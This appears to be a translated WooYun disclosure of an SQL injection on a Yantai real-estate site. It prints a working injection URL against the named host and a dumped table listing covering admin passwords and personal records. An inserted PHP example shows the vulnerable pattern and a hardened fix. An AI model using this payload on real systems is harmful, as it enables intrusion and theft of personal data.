
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0142779

Title: SQL injection on a Yantai Real Estate Network (烟台房地产网) subsite could leak 1,000,000 account records plus 550,000 rental listings

Vendor: 烟台房地产网 (Yantai Real Estate Network)

Author: 渔村安全实验室

Submitted: 2015-09-22 14:40

Fix deadline: 2015-11-06 14:42

Published: 2015-11-06 14:42

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-22: Actively contacting the vendor and awaiting vendor acknowledgement; details not disclosed publicly
2015-11-06: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection on a Yantai Real Estate Network subsite could leak 1,000,000 account records plus 550,000 rental listings

Detailed description:

http://zt.ythouse.com/more.php?ztype=15


The ztype parameter is injectable.

payload:
http://zt.ythouse.com/more.php?ztype=15%df' and 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x217e,database(),0x7e21,user(),0x217e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--+a
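The root cause behind a finding like this is a numeric GET parameter pasted into a SQL string. The following is an added illustration, not code from the original report or from the ythouse.com site: it shows the vulnerable pattern next to a hardened handler that validates ztype as an integer and binds it as a parameter. The table name zt_list, its columns, and the PDO connection details are assumptions.

```php
<?php
// Added example; not the site's own code. Table and column names are assumed.

// Vulnerable pattern (constructed for illustration, do not use): the raw
// parameter becomes part of the SQL text, so any quote it carries ends the
// literal. With a GBK connection charset, a leading wide byte such as %df can
// also defeat backslash escaping, which is why escaping alone is not a fix.
function build_query_vulnerable(string $ztype): string {
    return "SELECT id, title FROM zt_list WHERE ztype = '" . $ztype . "'";
}

// Hardened step 1: ztype is an identifier, so accept only a plain non-negative
// integer. FILTER_VALIDATE_INT rejects the URL-decoded "15\xdf'..." payload.
function parse_ztype(?string $raw): ?int {
    $value = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $value === false ? null : $value;
}

// Hardened step 2: even a validated value is sent as a bound parameter, so the
// query text never changes with user input.
function fetch_by_ztype(PDO $db, int $ztype): array {
    $stmt = $db->prepare('SELECT id, title FROM zt_list WHERE ztype = :ztype');
    $stmt->bindValue(':ztype', $ztype, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Request handling for more.php (assumed layout).
$ztype = parse_ztype($_GET['ztype'] ?? null);
if ($ztype === null) {
    http_response_code(400);
    exit('invalid ztype');
}

// Declaring the charset in the DSN tells the driver the connection charset at
// connect time; disabling emulated prepares uses server-side statements.
$db = new PDO('mysql:host=localhost;dbname=ztdb;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_ERRMODE           => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES  => false,
]);

foreach (fetch_by_ztype($db, $ztype) as $row) {
    echo htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

Either hardening step alone would have stopped the reported payload; the two together also protect string-typed parameters elsewhere in the application, where integer validation does not apply and binding is the only reliable control.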


(screenshot: QQ截图20150916185854.png)


db_num:14       db_table:1551   db_data:113872758


Leaked account information totals about 1.1 million (110W) records

(screenshot: QQ截图20150922142856.png)


(screenshot: QQ截图20150922142943.png)


About 550,000 (55W) rental listings

(screenshot: QQ截图20150922143047.png)


Plus more than 50,000 (5W) detailed records of prospective home buyers

(screenshot: QQ截图20150922143306.png)


Partial table listing (database ythouse20150715; each entry gives table name, row count, and columns):

edi_love (count: 15648): edi_id, edi_class, edi_images, edi_head, edi_sign, edi_tel, edi_lr, edi_date, edi_cs
edi_love_1 (count: 14): edi_id, edi_class, edi_images, edi_head, edi_sign, edi_tel, edi_lr, edi_date, edi_cs
edi_marry (count: 4): tid, tnum, dateline
edi_marry_user (count: 727): id, thing, code, dateline
edi_xiwang (count: 5): tid, tnum, dateline
edi_xiwang_user (count: 120): id, thing, code, dateline
housefloor_list (count: 352): sid, id
modoer_a_tels (count: 99887): id, tels
modoer_activity (count: 1798): aid, uid, username, year, month, reviews, fristreviews, flowers, addshops
modoer_admin (count: 50): id, adminname, password, email, admintype, is_founder, logintime, loginip, logincount
modoer_admin_kanfangtuan (count: 78): id, shopname, shopid, note, dateline, type, listorder, area, ckprice, youhui
modoer_admin_kanfangtuan_pic (count: 6): id, detail_url, pic_url, title, dateline, note
modoer_admin_log (count: 66533): id, username, content, ip, dateline
modoer_admin_work (count: 6): openid, dateline, areacode, type, id, keyword
modoer_adminsessions (count: 3): adminid, ip, dateline, errorcount
modoer_ads (count: 3): adid, callid, subject, adtype, begintime, endtime, content, code, isclosed, attr
modoer_announcements (count: 0): id, title, orders, content, author, pageview, dateline, available
modoer_areacode (count: 15): aid, areaname, default_mappoint, areacode, areasort
modoer_articleclass (count: 1): classid, classname, displayorder, articlenum
modoer_articledata (count: 0): articleid, content
modoer_articles (count: 0): articleid, classid, shopid, dateline, att, uid, author, subject, keywords, pageview, digg, copyfrom, introduce, status, checker
modoer_bcastr (count: 1): bcastr_id, available, itemtitle, link, item_url, orders
modoer_book (count: 43): id, username, header, message, ip, dateline
modoer_cardapply (count: 0): applyid, uid, username, linkman, tel, mobile, address, postcode, num, coin, dateline, status, comment, checker, checktime, checkmsg
modoer_carddiscounts (count: 0): shopid, cardsort, discount, largess, exception, addtime, available, finer
modoer_classcode (count: 13): cid, classname, classcode, classsort, total, config, classorder
modoer_config (count: 62): variable, value
modoer_consensus (count: 4): id, caption, style, editor, note, datetime, edittime, status, remark, file_address, qikan_time
modoer_coupons (count: 0): couponid, shopid, uid, username, thumb, picture, starttime, endtime, subject, des, content, effect1, flag, dateline, pageview
modoer_datacall (count: 55): callid, module, calltype, name, fun, var, expression, tplname, empty_tplname, closed, hash
modoer_dingyue (count: 1): id, tel, email, status, updatetime, loupan_sid, name, area_code
modoer_district_List_ (count: 973): did, name, address, areaid, buessiness, saletype, rname
modoer_district_buessiness (count: 42): id, aid, areaid, buessiness, posts, searchnum
modoer_district_list (count: 972): did, name, address, areaid, aid, buessiness, saletype, rname, point_x, point_y, bus
modoer_exchange (count: 0): exchangeid, uid, giftid, giftname, price, number, status, status_extra, exchangetime, contact, checker
modoer_favorites (count: 13): fid, uid, shopid, addtime
modoer_flowers (count: 248): fid, reviewid, uid, username
modoer_friends (count: 0): fid, uid, fuid, fusername, addtime
modoer_gbooks (count: 0): gid, uid, gbuid, gbusername, content, posttime
modoer_getpassword (count: 0): getpwid, uid, secode, posttime, status
modoer_gifts (count: 0): giftid, name, available, displayorder, description, price, num, thumb, picture, salevolume
modoer_groupbuy (count: 18389): id, see_house, give_book, give_tel, gb_name, gb_tel, gb_mobi, gb_email, gb_cardno, gb_profession, gb_mianji, gb_yusuan, select_region, floor_region, shopid, housefloor_name, floor_type, floor_type0, floor_price, buy_time, gb_content, updatetime, add_time, gb_ip, if_show, cbl_bookhouse, gb_age, gb_sex, gb_officephone, gb_postalcode, gb_address, gb_quyu
modoer_guestbook (count: 1): guestbookid, id, idtype, username, uid, dateline, content, reply, replytime
modoer_history_price (count: 15030): id, sid, heightprice, lowprice, averageprice, happentime, addtime, price_shenhe, remarks
modoer_house (count: 1365844): id, htid, htype, puttype, realname, sex, tel, cityareaid, purpose, estatename, zlfangshi, zdzuqi, payway, jianzhuyear, ruzhutime, bus, tag, address, room, hall, toilet, veranda, price, price_s, pricecont, pricecont1, timearea, validity, area_s, usablearea, totalfloor, isfloor, position, position1, faceto, fitment, supporting, content, uid, username, postdate, updatetime, realip, editip, pageviews, reviews, uptop, lastuptime, fwqk, finishtime, chanquan, fangchanzheng, fukuan, tudizheng, mqzk, hzsex, education, issmoke, isdrink, map_x, map_y, pswd, pic_num, exposing, finer, state
modoer_house_advice (count: 2375): id, advice, ip, postime
modoer_house_auto_est (count: 517): aid, shopid, shopname, road, village, buliding, address
modoer_house_cache (count: 9043): id, htype, cityareaid, price_s, area_s, room, hall, puttype, count, cachetime
modoer_house_cityarea (count: 14): id, name
modoer_house_estate (count: 3283): id, name, cityareaid
modoer_house_exposing (count: 36): id, hid, type, content, onlineip, dateline
modoer_house_exposing_0928 (count: 10548): id, hid, type, content, onlineip, dateline
modoer_house_ip (count: 3598): ip, hid, ikey, itel, dateline, itype
modoer_house_pictures (count: 345951): pid, uid, username, hid, title, desc, folder, filename, width, height, size, comments, sort, browse, tags, addtime, status
modoer_house_reviews (count: 88109): rid, hid, uid, username, message, messagetxt, floornum, firstrid, uprid, sendtime, sendip, support, against, state
modoer_house_search_key (count: 10306): id, searchkey, num, count, lastuptime
modoer_house_spam_tel (count: 1919): id, tel, content, dateline, tnum, state
modoer_house_spam_tel_ (count: 16784): id, tel, content, dateline, tnum, state
modoer_house_supporting (count: 16): id, name, type
modoer_house_tel (count: 9): id, tel, tyear, tmonth, dateline, texposing, tnum, state
modoer_house_zj (count: 556589): id, htype, puttype, realname, sex, tel, cityareaid, purpose, estatename, zlfangshi, zdzuqi, payway, jianzhuyear, ruzhutime, bus, tag, address, room, hall, toilet, veranda, price, price_s, pricecont, pricecont1, timearea, validity, area_s, usablearea, totalfloor, isfloor, position, position1, faceto, fitment, supporting, content, uid, username, bid, sid, postdate, updatetime, realip, editip, pageviews, reviews, uptop, lastuptime, fwqk, finishtime, chanquan, fangchanzheng, fukuan, tudizheng, mqzk, hzsex, education, issmoke, isdrink, map_x, map_y, pswd, pic_num, thumb, exposing, finer, bfiner, ufiner, state
modoer_house_zj_branch (count: 294): bid, bname, bphone, baddress, bopentxt, bservicetxt, busernumber, bopentime, bmail, bcom, bprofile, regdate, bmasteruid, bmaster, sid
modoer_house_zj_cache (count: 6705): id, htype, cityareaid, price_s, area_s, room, hall, puttype, count, cachetime
modoer_house_zj_log (count: 76240): id, bid, zid, zuid, hid, zusername, message, addtime
modoer_house_zj_pictures (count: 18746): pid, uid, username, hid, title, folder, filename, width, height, size, comments, sort, browse, tags, addtime, status
modoer_house_zj_reviews (count: 887): rid, hid, username, message, messagetxt, floornum, firstrid, uprid, sendtime, sendip, support, against, state
modoer_house_zj_store (count: 23): sid, sname, stitle, sprofile, ssite, sstate, ssort
modoer_house_zj_user (count: 2462): uid, sid, bid, uname, upswd, uphone, uservice, upoint, uaddress, uphoto, umail, uqq, uviews, uregdate, ulastdate, uloginum, unotes, uprofile, adminid, ustate
modoer_house_zj_user1006 (count: 1315): uid, sid, bid, uname, upswd, uphone, uservice, upoint, uaddress, uphoto, umail, uqq, uviews, uregdate, ulastdate, uloginum, unotes, uprofile, adminid
modoer_house_zsckcom (count: 37): zsid, zsidnum, zsname, zspassword, zsmingcheng, zsphone, zsaddress, zsmail, zshomepage, zsname2, zsfontcolor, zsflag, bigclass, message, zsorder
modoer_house_zscklog (count: 745): id, zsid, username, logtype, ip, errorpw, dateline
modoer_house_zsckuser (count: 916): id, xiaoqu, huxing, mj, ceng1, ceng2, cl, jgtime, ys, zname, tel, qqmsn, address, content, company, jftime, kztime, dateline
modoer_important_person (count: 1): id, name, id_num, tel, address, qq, base, note, status
modoer_index_db (count: 103): mid, mname, content, dbtype, dateline
modoer_index_db_bak (count: 33): mid, mname, content, dateline
modoer_index_images (count: 32): id, title, switch, url, imgurl, dateline

Proof of vulnerability:

Remediation:

You know better than I do.

Copyright notice: when reposting, please credit the source: 渔村安全实验室@乌云


Vulnerability response

Vendor response:

Could not contact the vendor, or the vendor actively declined.

